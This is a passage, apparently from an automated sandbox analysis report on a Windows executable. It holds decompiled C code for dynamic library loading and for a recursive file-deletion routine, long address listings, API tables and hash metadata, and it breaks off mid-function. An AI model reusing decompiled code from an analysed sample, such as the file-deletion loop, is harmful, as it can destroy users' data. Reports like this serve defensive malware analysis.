						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323);
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E736115C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E736112FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E736115C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323);
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E736112FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E736112FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E736112FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E73611224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E736112FE(_t90) * 4);
					goto L165;
				}
			}



































































                                                                                                            0x73611aa0
                                                                                                            0x73611aa3
                                                                                                            0x73611aa6
                                                                                                            0x73611aa9
                                                                                                            0x73611aac
                                                                                                            0x73611aaf
                                                                                                            0x73611ab2
                                                                                                            0x73611ab4
                                                                                                            0x73611ab7
                                                                                                            0x73611aba
                                                                                                            0x73611abf
                                                                                                            0x73611ac2
                                                                                                            0x73611aca
                                                                                                            0x73611ad2
                                                                                                            0x73611ad4
                                                                                                            0x73611ad7
                                                                                                            0x73611adf
                                                                                                            0x73611adf
                                                                                                            0x73611ae4
                                                                                                            0x73611ae7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611af1
                                                                                                            0x73611af3
                                                                                                            0x73611af8
                                                                                                            0x73611afa
                                                                                                            0x73611b8b
                                                                                                            0x73611b8b
                                                                                                            0x73611b8b
                                                                                                            0x73611b8f
                                                                                                            0x73611b92
                                                                                                            0x73611b94
                                                                                                            0x73611bb6
                                                                                                            0x73611bb9
                                                                                                            0x73611bbb
                                                                                                            0x73611bc4
                                                                                                            0x73611bca
                                                                                                            0x73611bcc
                                                                                                            0x73611bd2
                                                                                                            0x73611bd2
                                                                                                            0x73611bd8
                                                                                                            0x73611bdb
                                                                                                            0x73611bdb
                                                                                                            0x73611bde
                                                                                                            0x73611bde
                                                                                                            0x73611be4
                                                                                                            0x73611be6
                                                                                                            0x73611be9
                                                                                                            0x73611bef
                                                                                                            0x73611bf2
                                                                                                            0x73611bf2
                                                                                                            0x73611bf4
                                                                                                            0x73611bfa
                                                                                                            0x73611bfd
                                                                                                            0x73611c21
                                                                                                            0x73611c24
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611c27
                                                                                                            0x73611c29
                                                                                                            0x73611c37
                                                                                                            0x73611c3a
                                                                                                            0x73611c3c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611c3e
                                                                                                            0x73611c3e
                                                                                                            0x73611c3e
                                                                                                            0x73611c44
                                                                                                            0x73611c46
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611c48
                                                                                                            0x73611c4a
                                                                                                            0x73611c4c
                                                                                                            0x73611c4e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611c4e
                                                                                                            0x73611c50
                                                                                                            0x73611c52
                                                                                                            0x73611c54
                                                                                                            0x73611c54
                                                                                                            0x73611c5a
                                                                                                            0x73611c60
                                                                                                            0x73611c62
                                                                                                            0x73611c76
                                                                                                            0x73611c76
                                                                                                            0x73611c78
                                                                                                            0x73611c64
                                                                                                            0x73611c6a
                                                                                                            0x73611c6d
                                                                                                            0x73611c6d
                                                                                                            0x00000000
                                                                                                            0x73611bff
                                                                                                            0x73611bff
                                                                                                            0x73611bff
                                                                                                            0x73611c00
                                                                                                            0x73611c08
                                                                                                            0x73611c0c
                                                                                                            0x73611c12
                                                                                                            0x73611c16
                                                                                                            0x00000000
                                                                                                            0x73611c16
                                                                                                            0x73611c02
                                                                                                            0x73611c02
                                                                                                            0x73611c03
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611c05
                                                                                                            0x73611c06
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611c06
                                                                                                            0x73611b96
                                                                                                            0x73611b97
                                                                                                            0x73611ba0
                                                                                                            0x73611ba3
                                                                                                            0x73611bb0
                                                                                                            0x73611bb0
                                                                                                            0x73611ba5
                                                                                                            0x73611ba5
                                                                                                            0x73611c7e
                                                                                                            0x73611c81
                                                                                                            0x73611c84
                                                                                                            0x73611cf6
                                                                                                            0x73611cfa
                                                                                                            0x73611adc
                                                                                                            0x00000000
                                                                                                            0x73611adc
                                                                                                            0x00000000
                                                                                                            0x73611cfa
                                                                                                            0x73611b94
                                                                                                            0x73611b00
                                                                                                            0x73611b03
                                                                                                            0x73611b66
                                                                                                            0x73611b69
                                                                                                            0x73611b7a
                                                                                                            0x73611b7a
                                                                                                            0x73611b7d
                                                                                                            0x73611c89
                                                                                                            0x73611c8c
                                                                                                            0x73611c8c
                                                                                                            0x73611c8e
                                                                                                            0x73612033
                                                                                                            0x73612045
                                                                                                            0x73612045
                                                                                                            0x73612047
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612037
                                                                                                            0x73612038
                                                                                                            0x7361203b
                                                                                                            0x7361203e
                                                                                                            0x736120ba
                                                                                                            0x736120c1
                                                                                                            0x736120c6
                                                                                                            0x736120c9
                                                                                                            0x73611cf2
                                                                                                            0x73611cf2
                                                                                                            0x73611cf2
                                                                                                            0x73611cf3
                                                                                                            0x00000000
                                                                                                            0x73611cf3
                                                                                                            0x73612040
                                                                                                            0x73612042
                                                                                                            0x73612042
                                                                                                            0x73612049
                                                                                                            0x7361204b
                                                                                                            0x736120ae
                                                                                                            0x73611ce7
                                                                                                            0x73611cea
                                                                                                            0x73611ced
                                                                                                            0x73611cf0
                                                                                                            0x73611cf0
                                                                                                            0x00000000
                                                                                                            0x73611cf0
                                                                                                            0x7361204d
                                                                                                            0x7361204f
                                                                                                            0x73612055
                                                                                                            0x73612055
                                                                                                            0x73612057
                                                                                                            0x7361205a
                                                                                                            0x7361206d
                                                                                                            0x7361206d
                                                                                                            0x73612070
                                                                                                            0x73612073
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612075
                                                                                                            0x73612078
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361207a
                                                                                                            0x73612081
                                                                                                            0x73612081
                                                                                                            0x73612087
                                                                                                            0x7361208a
                                                                                                            0x736120a6
                                                                                                            0x7361208c
                                                                                                            0x73612095
                                                                                                            0x73612098
                                                                                                            0x73612098
                                                                                                            0x00000000
                                                                                                            0x7361208a
                                                                                                            0x7361205c
                                                                                                            0x7361205f
                                                                                                            0x73612062
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612064
                                                                                                            0x00000000
                                                                                                            0x73612064
                                                                                                            0x73612051
                                                                                                            0x73612053
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612053
                                                                                                            0x73611c94
                                                                                                            0x73611c94
                                                                                                            0x73611c95
                                                                                                            0x73611dde
                                                                                                            0x73611dde
                                                                                                            0x73611de5
                                                                                                            0x73611de8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611df5
                                                                                                            0x00000000
                                                                                                            0x73611fdb
                                                                                                            0x73611fde
                                                                                                            0x73611fe1
                                                                                                            0x73611fe1
                                                                                                            0x73611fe2
                                                                                                            0x73611fe5
                                                                                                            0x73611fe7
                                                                                                            0x73611fe9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611feb
                                                                                                            0x73611feb
                                                                                                            0x73611fee
                                                                                                            0x73612000
                                                                                                            0x73612003
                                                                                                            0x73612006
                                                                                                            0x7361200c
                                                                                                            0x00000000
                                                                                                            0x7361200c
                                                                                                            0x73611ff0
                                                                                                            0x73611ff0
                                                                                                            0x73611ff2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611ff4
                                                                                                            0x73611ff6
                                                                                                            0x73611ff8
                                                                                                            0x73611ff8
                                                                                                            0x73611ff8
                                                                                                            0x73611ff9
                                                                                                            0x73611ffb
                                                                                                            0x73611ffd
                                                                                                            0x73611fe1
                                                                                                            0x73611fe2
                                                                                                            0x73611fe5
                                                                                                            0x73611fe7
                                                                                                            0x73611fe9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611fe9
                                                                                                            0x00000000
                                                                                                            0x73611e3c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611e48
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611e2f
                                                                                                            0x73611e33
                                                                                                            0x73611e37
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611fad
                                                                                                            0x73611fb1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611fb7
                                                                                                            0x73611fbf
                                                                                                            0x73611fc6
                                                                                                            0x73611fce
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f15
                                                                                                            0x73611f15
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611e51
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361202b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f1d
                                                                                                            0x73611f1f
                                                                                                            0x73611f1f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361201b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361201f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612027
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f64
                                                                                                            0x73611f66
                                                                                                            0x73611f66
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f2f
                                                                                                            0x73611f31
                                                                                                            0x73611f31
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f41
                                                                                                            0x73611f43
                                                                                                            0x73611f43
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f72
                                                                                                            0x73611f74
                                                                                                            0x73611f74
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f4c
                                                                                                            0x73611f4e
                                                                                                            0x73611f4e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f53
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612023
                                                                                                            0x7361202d
                                                                                                            0x7361202d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f7d
                                                                                                            0x73611f81
                                                                                                            0x73611f86
                                                                                                            0x73611f89
                                                                                                            0x73611f8a
                                                                                                            0x73611f8d
                                                                                                            0x73611f93
                                                                                                            0x73611f93
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612013
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f57
                                                                                                            0x73611f57
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611e58
                                                                                                            0x73611e58
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f6b
                                                                                                            0x73611f6d
                                                                                                            0x73611f6d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611dfc
                                                                                                            0x73611e02
                                                                                                            0x73611e05
                                                                                                            0x73611e07
                                                                                                            0x73611e07
                                                                                                            0x73611e0a
                                                                                                            0x73611e0e
                                                                                                            0x73611e1b
                                                                                                            0x73611e1d
                                                                                                            0x73611e23
                                                                                                            0x73611e23
                                                                                                            0x73611e23
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f20
                                                                                                            0x73611f20
                                                                                                            0x73611f22
                                                                                                            0x73611f29
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f67
                                                                                                            0x73611f67
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f32
                                                                                                            0x73611f32
                                                                                                            0x73611f34
                                                                                                            0x73611f3b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f44
                                                                                                            0x73611f44
                                                                                                            0x73611f46
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f75
                                                                                                            0x73611f75
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f4f
                                                                                                            0x73611f4f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f9b
                                                                                                            0x73611f9f
                                                                                                            0x73611fa4
                                                                                                            0x73611fa7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f59
                                                                                                            0x73611f59
                                                                                                            0x73611f5c
                                                                                                            0x73611f5e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611f6e
                                                                                                            0x73611f6e
                                                                                                            0x73611f77
                                                                                                            0x73611f77
                                                                                                            0x73611e5a
                                                                                                            0x73611e5a
                                                                                                            0x73611e5d
                                                                                                            0x73611e64
                                                                                                            0x73611e66
                                                                                                            0x73611e68
                                                                                                            0x73611e6f
                                                                                                            0x73611e72
                                                                                                            0x73611e77
                                                                                                            0x73611e79
                                                                                                            0x73611e7b
                                                                                                            0x73611e7f
                                                                                                            0x73611e85
                                                                                                            0x73611e8b
                                                                                                            0x73611e8b
                                                                                                            0x73611e8d
                                                                                                            0x73611e8d
                                                                                                            0x73611e8e
                                                                                                            0x73611e8e
                                                                                                            0x73611e92
                                                                                                            0x73611e98
                                                                                                            0x73611e9a
                                                                                                            0x73611e9e
                                                                                                            0x73611ea3
                                                                                                            0x73611ea3
                                                                                                            0x73611ea5
                                                                                                            0x73611ea5
                                                                                                            0x73611ea8
                                                                                                            0x73611eab
                                                                                                            0x73611eb4
                                                                                                            0x73611eb7
                                                                                                            0x73611eba
                                                                                                            0x73611eba
                                                                                                            0x73611ebc
                                                                                                            0x73611ebf
                                                                                                            0x73611ec5
                                                                                                            0x73611ecb
                                                                                                            0x73611ecb
                                                                                                            0x73611ecd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611ed3
                                                                                                            0x73611ed3
                                                                                                            0x73611ed7
                                                                                                            0x73611ede
                                                                                                            0x73611f02
                                                                                                            0x73611f02
                                                                                                            0x73611f06
                                                                                                            0x73611f08
                                                                                                            0x73611f0b
                                                                                                            0x73611f0b
                                                                                                            0x73611f0e
                                                                                                            0x73611f0e
                                                                                                            0x00000000
                                                                                                            0x73611f06
                                                                                                            0x73611ee3
                                                                                                            0x73611ee6
                                                                                                            0x73611ee6
                                                                                                            0x73611eed
                                                                                                            0x73611eef
                                                                                                            0x73611ef2
                                                                                                            0x73611ef9
                                                                                                            0x73611efa
                                                                                                            0x73611f00
                                                                                                            0x73611f00
                                                                                                            0x00000000
                                                                                                            0x73611f00
                                                                                                            0x73611ef4
                                                                                                            0x73611ef7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611ef7
                                                                                                            0x73611e87
                                                                                                            0x73611e89
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611df5
                                                                                                            0x73611c9b
                                                                                                            0x73611c9b
                                                                                                            0x73611c9c
                                                                                                            0x73611ddb
                                                                                                            0x00000000
                                                                                                            0x73611ddb
                                                                                                            0x73611ca2
                                                                                                            0x73611ca3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611ca9
                                                                                                            0x73611cac
                                                                                                            0x73611da0
                                                                                                            0x73611da0
                                                                                                            0x73611da3
                                                                                                            0x73611db8
                                                                                                            0x73611dba
                                                                                                            0x73611dba
                                                                                                            0x73611dbb
                                                                                                            0x73611dbe
                                                                                                            0x73611dc1
                                                                                                            0x73611dcd
                                                                                                            0x73611dcd
                                                                                                            0x73611dcd
                                                                                                            0x73611dc3
                                                                                                            0x73611dc3
                                                                                                            0x73611dc3
                                                                                                            0x73611dd3
                                                                                                            0x00000000
                                                                                                            0x73611dd3
                                                                                                            0x73611da5
                                                                                                            0x73611da5
                                                                                                            0x73611da6
                                                                                                            0x73611db4
                                                                                                            0x00000000
                                                                                                            0x73611db4
                                                                                                            0x73611da9
                                                                                                            0x73611daa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611db0
                                                                                                            0x00000000
                                                                                                            0x73611db0
                                                                                                            0x73611cb2
                                                                                                            0x73611d9c
                                                                                                            0x00000000
                                                                                                            0x73611d9c
                                                                                                            0x73611cb8
                                                                                                            0x73611cb8
                                                                                                            0x73611cbb
                                                                                                            0x73611ce4
                                                                                                            0x00000000
                                                                                                            0x73611ce4
                                                                                                            0x73611cbd
                                                                                                            0x73611cbd
                                                                                                            0x73611cc0
                                                                                                            0x73611cda
                                                                                                            0x00000000
                                                                                                            0x73611cda
                                                                                                            0x73611cc2
                                                                                                            0x73611cc2
                                                                                                            0x73611cc5
                                                                                                            0x73611cd4
                                                                                                            0x00000000
                                                                                                            0x73611cd4
                                                                                                            0x73611cc8
                                                                                                            0x73611cc9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611ccb
                                                                                                            0x00000000
                                                                                                            0x73611b83
                                                                                                            0x73611b83
                                                                                                            0x73611b86
                                                                                                            0x00000000
                                                                                                            0x73611b86
                                                                                                            0x73611b7d
                                                                                                            0x73611b6b
                                                                                                            0x73611b6f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611b71
                                                                                                            0x73611b74
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611b74
                                                                                                            0x73611b05
                                                                                                            0x73611b08
                                                                                                            0x73611b3e
                                                                                                            0x73611b41
                                                                                                            0x00000000
                                                                                                            0x73611b47
                                                                                                            0x73611b49
                                                                                                            0x73611b4d
                                                                                                            0x73611b54
                                                                                                            0x73611b5b
                                                                                                            0x73611b5e
                                                                                                            0x73611b61
                                                                                                            0x00000000
                                                                                                            0x73611b61
                                                                                                            0x73611b41
                                                                                                            0x73611b0a
                                                                                                            0x73611b0b
                                                                                                            0x73611b26
                                                                                                            0x73611b29
                                                                                                            0x00000000
                                                                                                            0x73611b2f
                                                                                                            0x73611b2f
                                                                                                            0x73611b36
                                                                                                            0x73611b39
                                                                                                            0x00000000
                                                                                                            0x73611b39
                                                                                                            0x73611b29
                                                                                                            0x73611b10
                                                                                                            0x00000000
                                                                                                            0x73611b16
                                                                                                            0x73611b16
                                                                                                            0x73611b1d
                                                                                                            0x00000000
                                                                                                            0x73611b1d
                                                                                                            0x73611b10
                                                                                                            0x73611d09
                                                                                                            0x73611d0e
                                                                                                            0x73611d13
                                                                                                            0x73611d17
                                                                                                            0x736121c6
                                                                                                            0x736121cc
                                                                                                            0x73611d29
                                                                                                            0x73611d2b
                                                                                                            0x73611d2c
                                                                                                            0x736120f1
                                                                                                            0x736120f1
                                                                                                            0x736120f4
                                                                                                            0x736120f7
                                                                                                            0x73612114
                                                                                                            0x7361211a
                                                                                                            0x7361211c
                                                                                                            0x73612122
                                                                                                            0x73612139
                                                                                                            0x73612139
                                                                                                            0x73612139
                                                                                                            0x73612146
                                                                                                            0x7361214c
                                                                                                            0x7361214f
                                                                                                            0x73612155
                                                                                                            0x73612157
                                                                                                            0x7361215a
                                                                                                            0x7361215c
                                                                                                            0x73612163
                                                                                                            0x73612168
                                                                                                            0x7361216b
                                                                                                            0x7361216d
                                                                                                            0x73612172
                                                                                                            0x73612184
                                                                                                            0x73612184
                                                                                                            0x73612172
                                                                                                            0x7361216b
                                                                                                            0x7361215a
                                                                                                            0x7361218a
                                                                                                            0x7361218d
                                                                                                            0x73612197
                                                                                                            0x7361219f
                                                                                                            0x736121ab
                                                                                                            0x736121b1
                                                                                                            0x736121b4
                                                                                                            0x736120e6
                                                                                                            0x736120e6
                                                                                                            0x00000000
                                                                                                            0x736120e6
                                                                                                            0x736121ba
                                                                                                            0x736121c0
                                                                                                            0x736121c0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x736121c2
                                                                                                            0x736121c2
                                                                                                            0x736121c2
                                                                                                            0x736121c2
                                                                                                            0x00000000
                                                                                                            0x7361218f
                                                                                                            0x7361218f
                                                                                                            0x73612195
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612195
                                                                                                            0x7361218d
                                                                                                            0x73612125
                                                                                                            0x7361212b
                                                                                                            0x7361212d
                                                                                                            0x73612133
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612133
                                                                                                            0x736120f9
                                                                                                            0x73612100
                                                                                                            0x73612106
                                                                                                            0x7361210c
                                                                                                            0x00000000
                                                                                                            0x7361210c
                                                                                                            0x73611d32
                                                                                                            0x73611d33
                                                                                                            0x736120d0
                                                                                                            0x736120d0
                                                                                                            0x736120d6
                                                                                                            0x736120d9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x736120e0
                                                                                                            0x736120e5
                                                                                                            0x00000000
                                                                                                            0x736120e5
                                                                                                            0x73611d3a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611d40
                                                                                                            0x73611d40
                                                                                                            0x73611d49
                                                                                                            0x73611d4e
                                                                                                            0x73611d54
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611d5a
                                                                                                            0x73611d67
                                                                                                            0x73611d6d
                                                                                                            0x73611d77
                                                                                                            0x73611d7d
                                                                                                            0x73611d85
                                                                                                            0x73611d95
                                                                                                            0x00000000
                                                                                                            0x73611d95

                                                                                                            APIs
                                                                                                              • Part of subcall function 73611215: GlobalAlloc.KERNELBASE(00000040,73611233,?,736112CF,-7361404B,736111AB,-000000A0), ref: 7361121D
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73611BC4
                                                                                                            • lstrcpyA.KERNEL32(00000008,?), ref: 73611C0C
                                                                                                            • lstrcpyA.KERNEL32(00000408,?), ref: 73611C16
                                                                                                            • GlobalFree.KERNEL32 ref: 73611C29
                                                                                                            • GlobalFree.KERNEL32 ref: 73611D09
                                                                                                            • GlobalFree.KERNEL32 ref: 73611D0E
                                                                                                            • GlobalFree.KERNEL32 ref: 73611D13
                                                                                                            • GlobalFree.KERNEL32 ref: 73611EFA
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 73612098
                                                                                                            • GetModuleHandleA.KERNEL32(00000008), ref: 73612114
                                                                                                            • LoadLibraryA.KERNEL32(00000008), ref: 73612125
                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 7361217E
                                                                                                            • lstrlenA.KERNEL32(00000408), ref: 73612198
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.344646038.0000000073611000.00000020.00020000.sdmp, Offset: 73610000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.344639568.0000000073610000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344652091.0000000073613000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344660536.0000000073615000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                            • String ID: Nxt
                                                                                                            • API String ID: 245916457-3788892007
                                                                                                            • Opcode ID: 3a74d10c704d664769341fa2ddfc9f4062d3ed7cc2a9d2ba70465b39b08d5df1
                                                                                                            • Instruction ID: 5cec43d0bacfe9a77172ce0287c6716a2c04ba9985f46446cbaf62e5d056e78b
                                                                                                            • Opcode Fuzzy Hash: 3a74d10c704d664769341fa2ddfc9f4062d3ed7cc2a9d2ba70465b39b08d5df1
                                                                                                            • Instruction Fuzzy Hash: 26229AB1D0460BDFDB12CFA4CA817AEBBF6BB05305F14852ED1A6A22C0D77496A1CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040548B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E0040548B(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040573A(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B66(0x4214a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056A0(_t72);
					} else {
						lstrcatA(0x4214a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405684( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B66(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040581E(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404F04(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404F04(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004058B4();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040548B(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a8 - 0x5c;
					if( *0x4214a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
